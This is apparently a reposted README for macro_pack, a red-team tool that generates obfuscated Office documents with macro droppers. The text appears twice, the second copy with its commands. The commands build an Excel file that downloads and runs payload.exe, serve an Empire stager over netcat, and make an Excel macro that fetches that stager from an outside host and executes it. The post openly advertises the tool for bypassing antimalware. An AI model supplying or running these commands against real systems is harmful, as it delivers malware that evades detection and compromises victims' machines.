The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.
This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from vb source to final Office document or other payload type.
Installation
Windows:
Just download the exe from here :
Usage
To get help you can use :
List all supported file formats:
Templates:
Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
Empire Launcher Stager Example
Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template
Generate a file containing Empire lauchcher
Make that file available on web server, ex with netcat:
Use macro_pack to generate DROPPER_PS payload in Excel file
When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
Source : https://github.com/sevagas/macro_pack
There are much more commands, you can checkout them on the github page.
This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from vb source to final Office document or other payload type.
Installation
Code:
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
sed -i 's/pywin32>=225//g' requirements.txt
pip3 install pypiwin32
pip3 install -r requirements.txt
Windows:
Just download the exe from here :
Usage
To get help you can use :
Code:
python3 src/macro_pack.py -h
List all supported file formats:
Code:
python3 src/macro_pack.py --listformats
Templates:
Code:
python3 src/macro_pack.py --listtemplates
Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
Code:
echo "https://myurl.url/payload.exe" "dropped.exe" | src/macro_pack.py -o -t DROPPER -G "drop.xlsm"
Empire Launcher Stager Example
Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template
Generate a file containing Empire lauchcher
Make that file available on web server, ex with netcat:
Code:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
Use macro_pack to generate DROPPER_PS payload in Excel file
Code:
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
Source : https://github.com/sevagas/macro_pack
There are much more commands, you can checkout them on the github page.